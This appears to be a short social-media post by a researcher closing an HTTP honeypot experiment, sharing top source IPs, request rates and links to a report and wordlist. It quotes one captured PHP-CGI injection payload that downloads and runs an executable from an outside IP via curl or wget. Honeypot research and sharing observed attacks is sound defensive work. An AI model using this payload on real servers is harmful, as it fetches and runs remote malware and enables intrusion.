HTTP Honeypot experiment

I've closed our little HTTP Honeypot experiment. Since our last report, we had an additional spike, and got some very interesting new payloads in our wordlists such as: /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?>. 

Check out a JoeSandbox report for the EXE which was attempted to be dropped using the payload from above: https://lnkd.in/dwegSJ-2

Check out the project on GitHub, including our updated wordlist: https://lnkd.in/dTvMKMCR

Check out our draft report from last week on the HiveHack page: https://lnkd.in/dJ6SuhQk

Some additional data:

Top 10 IPs with the highest count:

IP

146.235.220[.]43  7112

173.249.10[.]225  7111

43.134.58[.]129   1130

213.136.70[.]28   476

213.136.86[.]62   159

101.32.192[.]203   125

156.146.36[.]72    81

217.15.164[.]190   77

78.153.140[.]158   48

78.153.140[.]156   45

Average number of requests per hour: 57.99

PS: I am going to publish some more complex honeypots in the future. I would like to publish this one again, but I am seeking your advice on how to get more humans to interact with it. There are some ideas for next steps in the draft report, but I would appreciate your feedback!